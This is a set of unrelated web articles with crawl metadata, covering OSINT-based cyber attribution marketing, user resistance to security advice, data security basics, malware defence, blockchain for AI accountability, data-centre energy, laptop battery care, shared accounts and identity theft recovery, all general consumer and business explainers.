The WEBINT platform of Cobwebs will collect, analyze, and extract public data on all web layers, message boards, social media, etc. relating to the cyberattack automatically to provide executable insights. It also enables analysts and investigators to search for specific individuals and/or keywords to investigate certain online forums and market places on the dark web where threat actors and persons of interest might hide. Since even the savviest threat actors leave digital footprints, the sophisticated machine-learning algorithms and AI will analyze the collected data to de-anonymize the threat actors behind the cyberattack.
Overall, an AI-powered WEBINT platform functions as a Swiss army knife when it comes to cyber attribution, utilizing:
• Natural Language Processing (NL) algorithms for AI text and entities analyses in minutes.
• AI Sentiment Analysis, which enables analysts and investigators to determine potential cyberattacks by gaining insights into the sentiment of each instance and communication.
• Structuring Big Data, which consists of the transformation of unstructured data into structured data that can easily be sorted through.
• AI Image Analysis, which provides analysts and investigators with image recognition and automatic image detection to keep track of threat actors and get alerted when a relevant image reappears.
• Trends Search, consisting of the analysis of geo-trending hashtags and keywords to assist analysts and investigators to follow trends and receive relevant information.
• Machine Learning algorithms to improve AI capabilities in terms of text analysis and face recognition, providing analysts and investigators with faster and more reliable results.
Last but not least, the platform can trigger real-time alerts regarding certain malicious activities, individual threat actors, and their social and business networks to prevent cyberattacks and related activities. | <urn:uuid:3485b960-d92a-45ba-a166-4af942d60eab> | CC-MAIN-2022-40 | https://cobwebs.com/for-cyber-attribution-a-webint-solution-is-a-must/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00386.warc.gz | en | 0.925566 | 694 | 3.03125 | 3 |
It is a quirk of human nature that we have a hard time contemplating abstract notions of danger, especially when it is introduced to us by others. In the simplest of examples, imagine a sign, placed next to a surface, that reads “Wet Paint.” Out of 100 people, how many do you think will touch the surface to see if it is indeed wet? The answer is always more than 50%.
This condition has a name, unsurprisingly called “Wet Paint Syndrome.” It springs from the idea that, when confronted with a situation demanding compliance, there will always be a proportion of a population that will reject the instruction, for one of a few reasons:
- Belligerence – the refusal to be told what to do, resulting in a directly opposite reaction: You tell me not to touch the paint, so I will touch it.
- Individual disbelief – the sign might be old, and the paint might already be dry, so I will check it myself.
- Collective disbelief – I saw that person touch it, so I am going to touch it.
- Cultural disbelief – the sign is fake news.
- Ignorance – I read the sign, but the warning did not register with me as something I should pay attention to.
- Reflex– I read the sign and, without thinking, touched the paint anyway.
Humans are guided in part by instinct and reflex. If we cannot perceive danger through our physical senses, then we cannot process it accurately. A poisonous snake, spoiled milk, the smell of smoke or the image of a pool of human blood – these are stimuli that make most people recoil. These forms of danger are accepted as real.
Cybersecurity: The Invisible Threat
When it comes to cyberhygiene activities, the threat we seek to avert seems, to many end users, to be invisible or inconsequential. It won’t be until the actual moment when a computer screen freezes and reveals a ransomware notice that the dangers of lax security become real.
People are suffering from alert fatigue. People have grown tired of repeated requests to update their passwords and so they simply modify one digit, upgrading from “Mary123” to “Mary124”.
But here’s the kicker. When offered the opportunity to use a solution to these tedious chores, such as a password manager, people recoil even further. A password manager is an app that generates passwords out of random character strings such as 86vPH*r1en@2@4FH. These are extremely difficult and time-consuming for hackers to guess but are equally difficult for people to memorize. But when it is explained that they do not have to memorize them at all, and that the password manager simply fills them in when needed, people push back. The comfort they feel in being able to remember their passwords exceeds that of having infinitely more secure passwords they can’t memorize.
Any security specialist who has tried to explain password managers will have experienced this sort of pushback. They will likely have stopped short of trying to explain exactly how password managers encrypt passwords at a device level using a salted hashing technique where none of the components, including the master password, actually are stored by the password manager itself. This is a type of dark magic that makes most peoples’ eyes glaze over.
Cybersecurity Expertise Includes Some Psychology
The point is that people in general cannot sit comfortably with change because change means confronting the unknown. Cybersecurity specialists must realize just how fragile the human instinct is when they frame arguments around safety and security protocols. Sometimes it all comes down to change resistance when they hear comments like “how can I trust a password that I can’t memorize,” or “back in my day we never needed Two Factor Authentication, so I’m not using it now.”
Just like a rapidly spreading virus, all it takes is one person to make that initial contact with an infected email link to penetrate the defenses of an organization and the organizations it is connected to.
A cybersecurity specialist’s portfolio of skills must include some psychology, which can be transformed into empathy, change management and communication skills. Although a central pillar of the job is to be proactive, success in the security field will not be complete until we recognize just how incompatible the concept of proactivity is with the day-to-day priorities of end users and frame our communication strategies around this.
For more information, read the Proactive Cybersecurity Beyond COVID-19 white paper.
By Steve Prentice
Steve Prentice is a project manager, writer, speaker and expert on productivity in the workplace, specifically the juncture where people and technology intersect. He is a senior writer for CloudTweaks. | <urn:uuid:5ffc88df-5533-48fa-b0b5-bcc6abb484a7> | CC-MAIN-2022-40 | https://cloudtweaks.com/2020/08/cyberhygiene-problems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00386.warc.gz | en | 0.944952 | 986 | 2.921875 | 3 |
All over the globe, the data that is generated daily is estimated to be millions of terabytes. Amazingly, most of this data consists of reports and logs, which means, their value is not equivalent.
Data security is mostly useful to individual users for the diagnosis and analysis of important information.
Many information can hide among the summed up daily data including personal data that may reveal sensitive details about a person, extremely classified business information, and Transaction details which usually allow cyber offenders to withdraw another person's cash seamlessly. Here is a vast ultimate guide to protecting your data.
What is Data security?
Data security is a top practice that is carried out by data users, aiming to protect their information saved in the cloud from illegal access, exposure and adjustments, accidental loss, corruption, or manipulation of the data's complete life cycle, or the creation of the data to its destruction.
Data security is an important factor in maintaining the integrity, confidentiality, and availability of business data. Integrity refers to making sure that the information is secure and complete. Confidential information means the data is protected privately and availability means access can be given to data owners only. Cybercriminals can try several means to get this data, which is why the authorized data owner must try everything to terminate their effort.
Since data security is a triad of confidentiality, integrity, and availability, it is collectively known as the CIA. If one or all of these are altered, by cyber criminals, it can cause a business to suffer monetary and reputational damage.
Therefore, data security action is created based on the CIA trio. The actions must include a scope of controls, policies, procedures, and technologies, that safeguards the information created, received, obtained, transmitted, and stored, by the business organization.
Why is Data Security Important?
Data security is necessary for business owners no matter the size of the business. It is also important for individuals who use computers at home. Sensitive data including account details, client details, personal files, bank information, and more, must be secured because if it is disclosed to unauthorized individuals, it can be abused or used unlawfully to hurt the data owner.
With data security, such useful information can be retrieved and protected. Here is why cyber security is important:
To Protect Your Integrity
Once your sensitive information gets into the wrong hands, it impacts your reputation negatively. The business that you have worked hard to build all these years can suddenly suffer due to a breach in your information.
This can be worrisome because several businesses obtain confidential data of clients or customers and these individuals trust the business owners to protect their data. The moment this information is leaked or lost to unknown sources, the business owner will face a lot of pressure from a host of customers or clients.
High Rates of Cyberthreats
Cyber threats are persistently occurring these days, which is why data security is important. If you operate any business without considering this cyber threat, then you must be ready to face attacks that can ruin your business. Aside from business enterprises, users of computers at home can also be at risk of attack because of the uprising of technology including the Internet, mobile devices, cloud computing, and more.
It is Complex and Expensive to Fix Data Damage
After data is exposed to the wrong hands, affected individuals can quickly or gradually recover from the impacts on their reputation. However, this may not be the same for the data that has been breached. Some of this information is never recovered, while some are difficult to fix as you can spend a lot of cash to do so.
How Does Data Security Help Businesses?
It Prevents Data Compromise
The topmost reason for securing data is that your data will be safeguarded from entering unauthorized hands. A well-secured data cannot be compromised easily by unknown sources. In addition, when you use data security to prevent exposure and leakage of personal data, you will not face data breaches and you will not lose your money to cyber thieves.
It Safeguards Privacy
Most information is strictly based on business while others are valuable information that are should be kept private. By protecting your information, your privacy will also be safeguarded.
It Reduces Compliance Amount
Data security is important because it helps to reduce the compliance amount, by centralizing and automating impacts. It also makes independent review procedures easy.
It Ensures Data Integrity
Data security helps in protecting against illegal data alterations, file configuration, and data structures.
What Are the Useful Data Security Rules?
Train Employees to Identify Threats
Once you train your employees to identify threats and protect themselves against these threats, they will no longer be vulnerable to attacks. Usually, your team of staff is most likely to be attacked by cybercriminals since they are perceived as weak and easy to manipulate.
Cybercriminals can target employees and steal sensitive information about the company through phishing, a strategy they use in invading IT facilities. To avoid such attacks, companies must provide quality training to employees, to help them identify different motives used by a cyber attacker and stay alert to frustrate their efforts.
Improve Compliance Efforts With Data Classification
Using data classification is a great way to tag data into different sections after identifying them. While doing this, ensure that you create categories depending on the importance of the information, such as content, file type, or privacy compliance.
If you use this process to save your information, your company's information will be compliant and secure. The visibility of your business will also improve and move to only categories where sensitive data is stored.
Treat Data Security Problems Seriously
Taking data security as a serious issue prepares you against problems with your business network. Data security should do more than change your password consistently. Data security should be comprehensive and analyzed strategically as a part of your business.
Developing a response plan before you are surprised by a cyber attack is very necessary. Follow the best measures to prevent data compromise and even though your efforts may not guarantee you complete safety from cyber criminals, you can do a lot to protect your business and information from them. | <urn:uuid:2d5a110d-38d4-4584-bfc8-c2b06e77e9fb> | CC-MAIN-2022-40 | https://www.kloud9it.com/2022/09/ultimate-guide-to-data-security-rules/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00586.warc.gz | en | 0.943385 | 1,242 | 2.9375 | 3 |
Alfonso XI, ‘the Avenger’, was a Spanish king who once described in awe how during a battle against the Marinids, they hurled many iron balls with thunder and the Christians were deeply afraid, as any man’s limb that was hit was sliced off as if with a knife. He was describing the impact of gunpowder on his troops. Soldiers, for whom in 14th century a battle meant swords, shields and arrows, were suddenly confronted with a new weapon that rendered their ‘security technology’ utterly useless.
It was a similar story when the Mark I tank entered into action in the battle of the Somme in 1916. The trench defenses prepared to repel soldiers offered scant resistance, and the bullets from soldiers’ rifles just bounced off the tank’s metal shell. Once again, there was no technology available to confront the new threat.
And away from the theatre of war, human beings have faced many situations in which our concept of security has had to adapt: What use were the handkerchiefs people wore around their faces to keep Spanish flu at bay in 1918? None whatsoever: the virus causing the flu was so small that no handkerchief could filter it out. Special filters had to be developed to protect against airborne viruses.
And today we also face similar problems with security systems, in this case, IT security. In the early days of personal computing, the emergence of viruses exposed users to a new threat for which they were ill-prepared. Existing technology was of no use and programs had to be developed to stop viruses: antivirus programs.
Shortly however, more advanced protection was needed. There were more and more viruses, and security laboratories were hard pushed to generate all the necessary vaccines. In the war that was being waged, the quality of the malware was practically irrelevant, the strategy was to saturate the antivirus developers. Whereas previously just a couple of dozen viruses a day were detected, now hundreds if not thousands were appearing.
Proactive detection technologies, designed to root out new malicious code, fulfill their purpose, but once again new weapons are being used that can breach even proactive defenses (and even these are only developed by a select few security companies).
Many businesses (and also home computers) have seen an upsurge in targeted attacks by hackers. Software using special stealth techniques (e.g. rootkits), unique creations targeted at a single computer with vital information… these are the new weapons. The ‘business opportunities’ of having, say, a Trojan spying on competitors are such that hackers are now renouncing the lure of personal notoriety in favor of cash rewards.
While these attacks surreptitiously harvest confidential information, new examples of malware still pour into security laboratories. It´s just like a scene from an epic war film: hundreds or thousands of soldiers charge into action, sacrificed for the cause, while on a distant hilltop the general watches as the special-forces secretly penetrate enemy lines.
The technology needs to be reinvented. The reactive technologies of the classic resident antivirus are simply not enough. The panorama has changed, and the protection strategy must also change. Outdated technologies are about as useful as a mediaeval shield against an assault rifle. Today, in the time it takes a lab technician to start up a computer to investigate a malicious code, an infection can spread massively. The record-holder in this field is SQLSlammer, which some sources claim took just 15 seconds.
To establish a protection system against new threats, we need to set up an intelligent layer of protection in every system connected to the Internet, be it a corporate workstation or a home PC. This means a system that can analyze what is happening on a computer and detect dangerous behavior, stopping it before it is too late.
This type of technology for detecting unknown threats (and I´m not speaking about classic heuristics systems, but intelligent technologies) are readily available from some manufacturers of consumer security solutions. But where is the protection for corporate networks? Why should administrators with hundreds or thousands of computers have to go without protection against unknown threats? | <urn:uuid:eb369bce-b728-4341-b5be-bfd02e6ac22d> | CC-MAIN-2022-40 | https://it-observer.com/new-protection-face-new-threats.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00586.warc.gz | en | 0.972617 | 843 | 2.90625 | 3 |
By Steve Todd
In a proactive move to “eliminate a future conflict,” Elon Musk recently stepped down as chairman of OpenAI, a nonprofit research company he cofounded two years ago aimed at building safe artificial intelligence (AI) with wide benefits for all. In 2014, Musk suggested AI could be “more dangerous than nuclear weapons,” a statement he reiterated at a recent SXSW event in Austin, TX.
Bill Gates also went on record several years ago about his concerns regarding machine superintelligence. The two technology leaders joined others in creating an open letter encouraging research into AI safeguards:
“It is important to research how to reap [AI] benefits while avoiding potential pitfalls.”
The open letter was accompanied by a research priorities proposal, highlighting work that can be done to make AI “robust and beneficial.”
Perhaps the most pressing question today is whether we can use current technologies — such as historical and preventative tracking — to build AI safeguards that not only figure out why an AI algorithm made a poor decision but also preclude other AI algorithms from making the same poor decision?
I believe the answer to that question is yes. Two existing technologies can come together to provide the ability to audit the decisions machines are making: a) Blockchain technology and b) any off-chain storage systems that are referenced by Blockchain. Together, they can form the foundation of a digital forensics platform that can be extended to monitor (and potentially regulate) super-intelligent decision-making.
Blockchain, introduced with Bitcoin in 2009, can be thought of as a tamper-proof ledger of transactions, though ledger entries do not have to necessarily contain records of financial transfers. Each blockchain transaction is time-stamped and can reference any type of “off-chain” data records that live in well-protected and secure storage systems. References to the data are implemented via very small character strings that can be easily stored within the ledger.
Off-chain storage technology is especially powerful when implemented by a special class of storage systems known as content-addressable storage (CAS); the first CAS system, Centera, was initially shipped in 2003. This type of storage system assigns unique digital fingerprints to every piece of digital content. Once stored, the data cannot be tampered with or deleted and can be retrieved based on content, not storage location.
The power of these two technologies is already on display as a solution for the medical industry. In “How to Achieve Data Privacy in Blockchain Ledgers,” Dr. Marten Neubauer details how the solution allows a medical record to be stored in an off-chain storage system. The record is assigned a unique identifier and the asset is then registered on a Blockchain system. When any doctor looks at (or tries to access) a patient record, it’s possible to also record that attempt on the blockchain, so a patient can track which doctor is looking at a particular private data record.
It’s easy to imagine how this solution could be applied to AI. Consider a use case in which an AI algorithm makes decisions in the context of a self-driving car. An AI vendor, for example, could store a new algorithm in an off-chain storage location. They could then “register” their algorithm as a blockchain transaction. The registration entry can require a vendor’s unique key, creating a digital signature that establishes ownership of their algorithm.
In this scenario, a connected car can then see this registered algorithm and download the software. As new data continually arrives to the car, this data can undergo a similar registration prior to analysis. The algorithm, the input data, and any output data, can all be stored off-chain and registered on-chain. This provides a chain of ownership in terms of which algorithms have analyzed particular data sets. If an accident should occur based on AI decisions, the blockchain provides a trustworthy record of how the decision was made.
This type of system will be critical to perform forensics on situations in which self-driving cars malfunction, perhaps crash, or cause damage and even loss of life. Just last week the first death in the self-driving car experiment occurred in Arizona. This is just one tragic example amongst many articulated by technology luminaries like Musk and Gates. If today’s simple AI algorithms can make mistakes that result in loss of life, what kind of mistakes will super-intelligent algorithms make?
Fortunately, Blockchain and off-chain digital forensics systems can provide time-stamped and immutable proof of why AI algorithms make their decisions. This offers a regulatory opportunity for holding companies responsible for ethical and reasonable use of AI technology. Not only can this technology conduct forensics for poor decisions, but also use the forensics data to train new models to avoid those poor decisions. An off-chain digital forensics platform can therefore be augmented to attack the problem of AI algorithms overextending their intelligence into areas in which they should not be participating.
Once these safeguards are put in place, regulated AI algorithms can then focus on bringing maximum benefit with minimal harm. Everyday examples of the benefits AI can bring include:
- Better fuel consumption and reduced carbon footprint
- Better student education
- Fraud reduction and prevention
- Safer social media
- Smarter personal assistants
While there are certainly obstacles to implementing this type of system (e.g., the network latency required to connect thousands of cars to a blockchain), a lack of research is not one, and the solution outlined is clearly within the realm of the possible.
In a recent study commissioned by Dell Technologies and conducted by the Institute for the Future, we are reminded that AI technologies, “enabled by significant advances in software, will underpin the formation of new human-machine partnerships.” While the fears articulated by Musk and Gates are real, we should be encouraged that existing technologies can already go a long way toward mitigating those fears. Blockchain and off-chain storage platforms are “trust technologies;” they allow us to trust the integrity of data across all AI connection points.
There are tremendous benefits to the adoption of AI in healthcare, in industry, in transportation and more. When measures are taken to deploy these two trusted technologies properly, the benefits to our world far outweigh the risks.
Steve Todd is a software engineer and inventor for Dell EMC with more than 170 patents granted by the USPTO. He earned Bachelors and Master’s Degrees in Computer Science from the University of New Hampshire. His inventions have generated tens of billions of dollars in revenue for Dell EMC. Steve is a Dell EMC Fellow and currently serves as the Vice President of Strategy and Innovation in the Office of the CTO, with a research emphasis on multi-cloud solutions, data value, and Blockchain. | <urn:uuid:6c2efe76-cc86-46b5-b669-5314853bc57d> | CC-MAIN-2022-40 | https://www.cio.com/article/228659/using-today-s-technologies-to-create-ai-safeguards-for-tomorrow.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00586.warc.gz | en | 0.939385 | 1,387 | 2.671875 | 3 |
Future of Grid Greening
As renewable and low-carbon energy becomes more prevalent, the sustainability of the electrical grid is improving over time. Our focus is on the continuing improvement of the grid’s greenhouse gas intensity and water intensity. Understanding these trends means that we need to build our data centers for the grid of tomorrow, rather than that of yesterday.
The ongoing improvement in grid carbon intensity means we should avoid building data centers that rely on combustion for primary operation (such as natural gas-fired heaters and chillers). Even if there are some savings today, our data centers are built to last. Electrical heating and cooling will serve us well into the future, allowing us to take advantage of the greening grid.
The generation of electricity for the grid using thermoelectric power plants (such as natural gas, oil, coal, and nuclear plants) consumes water. However, newer thermoelectric power plants are consuming less water, and most renewable technologies consume no water. With the reduction of water consumption in electrical generation over time, we should avoid building data centers today that rely on evaporating water for cooling. Even if there is some overall net water savings gained from current water cooling technology over the water used by grid electrical generation in some regions, locking our cooling infrastructure into a dependence on large amounts of water means that we can’t take advantage of these future grid improvements, leading to higher water use in the long run.
Even with market-based carbon reduction instruments like RECs and VPPAs, the location-based emission factor of the grid is still an important aspect of greenhouse gas inventories. As a Strategic Partner we provide the carbon intensity of each of our data centers to give our customers the information needed to choose locations that help meet their sustainability goals. | <urn:uuid:7ca650bd-db35-4e67-8a3c-dd681db8ddc5> | CC-MAIN-2022-40 | https://cyrusone.com/about/about-us/sustainability-4/sustainable-future/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00586.warc.gz | en | 0.93855 | 361 | 3.140625 | 3 |
The age of mobile technology is truly amazing. We can move from pillar to post as much as we please and still stay connected. However, we’re not completely mobile because we’re still chained to the nearest outlet with our device’s chargers while we keep a constant eye on the pesky little battery gauge. Yet, while we won’t ever truly be able to eliminate these things, there are a few ways to make your situation better. The first step is so know how to take care of your device’s battery. And when it comes to your laptop, we know just the steps you need to make sure your battery is running up to speed.
Saving cycles will help save your battery
All laptop batteries are built to handle a certain number of charge cycles, which is the process of charging a rechargeable battery and discharging it as required into a load. The term is typically used to specify a battery’s expected life. Essentially, a charge cycle equals one full discharge down to zero percent and then a recharge back up to 100 percent. Likewise, a discharge down to 50 percent and then back up to 100 percent would be equal to half a cycle. In other words, the fewer times you drain the battery, the longer your device’s battery will last you.
One of the best ways to do this is to switch your computer over to ‘eco-mode,’ a common systems preference that can be found on the main menu of your laptop’s OS. This mode will manage the way your device uses energy in an effort to conserve battery energy. Other ways that you can save your cycles is to manually reduce the amount of power you use by opting to shut off Wi-Fi, Bluetooth and keyboard backlighting when you’re not using them.
Another function that will be helpful is managing your laptop’s hibernation modes. Ideally, you want your laptop to enter hibernation before the battery is completely drained. Hibernation is typically a power state where everything in working memory has been written to the hard drive or SSD and then the laptop is turned completely off. But what makes hibernation different from other sleep states available with most modern laptops, it uses zero power while others use a minimal amount.
Additionally, it’s a good practice to quit any applications you have running in the background. These apps are what typically eat up your battery life. On a Windows computer, you can look at your System Tray, your Task Manager, and your Processes tab to see which of those icons really aren’t necessary. With macOS, you can see what apps are using the most power by clicking on the battery icon in the task-bar located in the upper right by opening the Activity Monitor and selecting the Energy section. Cloud storage services or video players that you aren’t using can be safely shut down.
Keeping your battery in zone
A few decades back when technology well less advanced, there was a common problem called “battery memory” that caused nickel-metal hydride (NiMH) batteries to “forget” their full charge capacity and start charging at lower and lower levels — until there was hardly any left. However, with the modern lithium-ion batteries that we have today, this issue is pretty much non-existent.
And you’ve probably heard that it’s a good practice to ‘drain’ your laptop’s battery every now and then to keep your battery working the way that it should — almost as if you are reminding it of its battery capacity. However, contrary to this popular belief, you do not need to complete discharge a lithium-ion battery and then charge it back up to somehow reboot or recalibrate the battery. This is actually a destructive practice that is very hard on your battery. Generally, the consensus seems to be that letting your battery discharge (not completely, but down to around 20 percent or so) and then charge it when possible is a much better practice to follow.
Another common misconception is that keeping your devices plugged in as often as possible (i.e. over night) is actually bad for your battery. The theory is based on the idea that letting a battery charge to 100 percent could eventually wear the battery out more quickly. However, today’s modern devices are designed to stop charging once they hit 100 percent and therefore keeping them plugged in hardly impacts the battery’s lifespan.
Generally speaking, the best thing you can do for your lithium-ion battery is to avoid letting it discharge below 20 percent. Plug it in and charge it when you can, and then rinse and repeat. The good news is that with modern batteries and systems there’s really not much else you need to do — except perhaps reasonably expect that your battery will eventually start losing its overall capacity.
Don’t let your laptop overheat
Lithium-ion batteries may be more durable than its predecessor, however, they are finicky devices that can only take so much in temperature fluctuations. Both high and low temperatures can damage your laptop battery permanently, or reduce its useful lifespan.
If your laptop ever begins to grow abnormally warm, perhaps because the CPU or graphics processor is working hard or the environment is overly hot, then be sure to shut the device down and if able, pop the battery out. Giving your device a break where it can cool down could save you the headache of having to purchase a new battery.
In all, you’ll want to give your laptop some good old TLC. On top configuring your settings to manage your device’s battery, you should also keep up with some maintenance by cleaning out your laptop of any dust and debris that may be clogging up the cooling vents. Make sure that the contact points are especially clean. And of course, keep your laptop up-to-date with software! Companies continuously work hard to improve the way programs use power via software updates. | <urn:uuid:2a753859-76a6-446a-bebd-a6d3ba8e940b> | CC-MAIN-2022-40 | https://hobi.com/how-to-care-for-your-laptop-battery/how-to-care-for-your-laptop-battery/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00586.warc.gz | en | 0.95611 | 1,226 | 2.546875 | 3 |
Shared Accounts is a method of using corporate resources and services for multiple users by having each of them authenticate with a single set of credentials. Shared accounts can be linked to role-based emails, servers, cloud platforms, services or databases.
A security downside to using shared accounts across multiple users is that they lack the visibility, certainty, and accuracy about a particular session that singularly-owned accounts do. This contradicts the main reason for authentication, which is the answer to the question, Am I Who I Say I Am? when access is requested. Shared accounts also use Single Factor Authentication (SFA) since hard and soft tokens cannot be managed among groups of user.
Going further, if in a shared account the credentials are deliberately or inadvertently shared with users outside of the known circle, the problem is amplified. The account log provides no visibility into this more serious failure to properly attribute a session.
Some services like email, for example, provide no alternative than to rely on the use of just one pair of credentials. They are designed to be tied to just one person so there is no other option than to use a shared account practice.
"Shared accounts such as role-based emails, for example 'hello at x dot com', are notorious for SFA-associated security risks. Not only do many other unauthorized users hold these credentials, but without these credentials more tightly tied to a user through hard or soft token MFA, it's just a wild west of risk and opacity for the enterprise that owns the underlying service ." | <urn:uuid:cea1ac2d-3125-4789-bed9-7f245d23df31> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/shared-accounts | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00586.warc.gz | en | 0.94127 | 317 | 2.6875 | 3 |
We live online these days, sharing everything from vacation pictures to what we eat for breakfast on the internet. The internet is also useful for daily activities, like buying groceries or paying bills.
While it’s convenient to connect with people and complete tasks online, cybercriminals are eager to use the internet to steal financial or personal data for their personal gain — otherwise known as identity theft. This is a criminal act and can affect your credit score in a negative way and cost money to fix. It can also affect employment opportunities since some employers conduct a credit check on top of drug testing and a criminal history check. Identity theft victims may even experience an impact to their mental health as they work to resolve their case.
The good news is that being able to recognize the signs of identity theft means you can act quickly to intervene and minimize any effects in case it happens to you. You can also protect yourself by using preventive measures and engaging in smart online behavior. This article provides essential information about identity theft, giving you the tools you need to become an empowered internet user and live your best life online.
5 steps to take if your identity has been stolen
The internet is a great place to be, but identity thieves hope to catch you off-guard and seek access to your personal information for their benefit. This could include private details like your birth date, bank account information, Social Security number, home address, and more. With data like this, an individual can adopt your identity (or even create a fake identity using pieces of your personal profile) and apply for loans, credit cards, debit cards, and more.
You don’t have to be kept in the dark, though. There are several signs that your identity has been stolen, from a change in your credit score to receiving unfamiliar bills and debt collectors calling about unfamiliar new accounts. If you suspect that you’ve been affected by identity fraud, you can act fast to minimize what happens. Here’s what to do.
File a police report
Start by contacting law enforcement to file a report. Your local police department can issue a formal report, which you may need to get your bank or other financial institution to reverse fraudulent charges. An official report assures the bank that you have been affected by identity fraud and it’s not a scam.
Before going to the police, gather all the relevant information about what happened. This could include the dates and times of fraudulent activity and any account numbers affected. Bringing copies of your bank statements can be useful. Also, make note of any suspicious activity that could be related. For example, was your debit card recently lost or your email hacked? The police will want to know.
Notify the company where the fraud occurred
You should also notify any businesses linked to your identity theft case. Depending on the type of identity theft, this could include banks, credit card companies, medical offices, health insurers, e-commerce stores, and more. For example, if someone used your credit card to make purchases on Amazon, alert the retailer.
Medical identity theft is another good example. In this case, a fraudster may assume your identity to gain access to health care services, such as medical checkups, prescription drugs, or pricey medical devices like wheelchairs. If someone uses your health insurance to get prescription drugs from a pharmacy, for instance, make sure to alert the pharmacy and your insurer.
File a report with the Federal Trade Commission
The Federal Trade Commission (FTC) is a government body that protects consumer interests. You can report identity theft via their portal, IdentityTheft.gov. They’ll then use the details you provide to create a free recovery plan you can use to address the effects of identity theft, like contacting the major credit bureaus or alerting the Internal Revenue Service (IRS) fraud department. You can report your case online or by calling 1-877-438-4338.
Ask credit reporting agencies to issue a fraud alert
A common consequence of identity theft is a dip in the victim’s credit score. For example, a cybercriminal may take out new lines of credit in the victim’s name, accrue credit card debt, and then not pay the balance. For this reason, contacting the credit monitoring bureaus is one of the most important steps to take in identity theft cases.
There are three main agencies: TransUnion, Equifax, and Experian. You can get a free credit report from each agency every 12 months via AnnualCreditReport.com. Check the report and note all fraudulent activity or false information and flag it with the relevant bureau’s fraud department. You should also initiate a fraud alert with each agency.
A fraud alert requires any creditors to verify your identity before opening a new line of credit. This adds an extra layer of security. An initial fraud alert lasts for 90 days. Once this expires, you can prolong your protection via an extended fraud alert, which will remain valid for seven years. You can notify one of the big three bureaus to set it up. They are then required to notify the other two bureaus.
A credit freeze is another smart move, which you can do through each of the three major credit bureaus. You can either call them or start the process online. This prevents people from accessing your credit report. Lenders, creditors, retailers, landlords, and others may want to see your credit as proof of financial stability. For example, if someone tries to open a phone contract under your name, the retailer may check the credit report. If there is a credit freeze in place, they won’t be able to view it and won’t issue the contract. If you need to allow someone access to your credit report, you can temporarily lift the freeze.
Change passwords to all of your accounts
Identity theft is often linked with leaked or hacked passwords. Even if you aren’t sure whether your passwords have been compromised, it’s best to play it safe. Change passwords to any affected accounts. Make sure to use strong passwords with a mix of numbers, letters, and symbols. Further, if there’s a chance to activate two-factor authentication on your accounts, this can provide added protection going forward.
Is it possible to prevent identity theft?
Ideally, you’ll never become the victim of identity theft, but things can happen. Cybercriminals work hard, but you can stay one step ahead by taking a few preventative measures. These include:
- Learn how to recognize common scams. ID theft comes in many forms, from email phishing scams to social media snooping, device hacking, and data breaches. Learn the signs of a scam. For example, phishing emails are often poorly written and frequently follow certain formats, like claiming that an account of yours has been suspended.
- Activate fraud alerts. Most financial institutions provide alerts about suspected fraudulent transactions, sending you a notification via phone call, text, or email if they notice suspicious activity on your account. The bank may also freeze an account automatically until any potentially unauthorized charges are clarified and confirmed by the account owner.
- Protect your devices with strong passwords. Your devices, including your phone, tablet, and laptop, should all be password-protected. In case one of your tech tools is stolen, it will be harder for fraudsters to gain access to your personal data. Set strong passwords with a mix of letters, numbers, and symbols. Make sure they don’t include information a person could figure out easily, like your home address or birthday.
- Use different passwords for different accounts. Any online accounts you use, from your banking app to your email, should be password-protected. Follow the same rules for setting strong passwords, but don’t duplicate passwords. If a hacker cracks the code for one account, they can easily guess their way into your other accounts. A password manager can help you stay on top of your passwords by encrypting them and storing them safely for easy tracking. McAfee Identity Protection includes a password manager that can secure your account credentials across devices.
- Protect your documents. Protect hard copies of sensitive documents, like your Social Security card and birth certificate, by keeping them locked away. Also, dispose of documents with personal data by shredding them. This ensures that dumpster divers can’t access your information. Documents to shred might include invoices, bank statements, medical records, canceled checks, and junk mail with your name, phone number, and address.
- Don’t overshare on social media. Social media is a great way to connect with friends and family, but it can also be a goldmine for identity thieves. Avoid sharing details like your kids’ or pets’ names, which are often used in passwords. Sensitive information, like a home address or birthday, can also be used to build a fake identity. You may want to set your social media accounts to private in addition to limiting what you share.
- Review your credit report. You have the right to one free copy of your credit report every 12 months, which you can request via AnnualCreditReport.com. This provides you with a report from each of the three major credit bureaus. Review the report, verifying personal information, account details, and public records (like bankruptcies or liens) to ensure there isn’t anything suspicious.
- Follow the news. When major corporations are targeted by hackers, they’re required to alert affected consumers. These breaches are also often reported in the media. To take a more proactive approach, though, check out the McAfee blog, which reports on breaches. If a business you use has been affected, change your passwords.
You can further protect yourself with antivirus software like McAfee’s Total Protection plan. This can help protect your devices against spyware and viruses. You can also enhance your network security with a firewall and virtual private network (VPN). A firewall controls traffic on your internet network based on predefined security parameters, while a VPN hides your IP address and other personal data.
Sign up for a protection plan today
Don’t let concerns about identity fraud keep you from enjoying all the conveniences and perks the internet offers. McAfee’s identity theft protection services can help you stay connected while keeping you safe. Tailor your package to your household’s needs to get the safeguards you want, like ID theft coverage, VPN, and 24/7 monitoring. Our Total Protection plan also comes with $1 million in identity theft coverage to cover qualifying losses and hands-on support to help you reclaim your identity.
With McAfee by your side, you can stay online confidently.
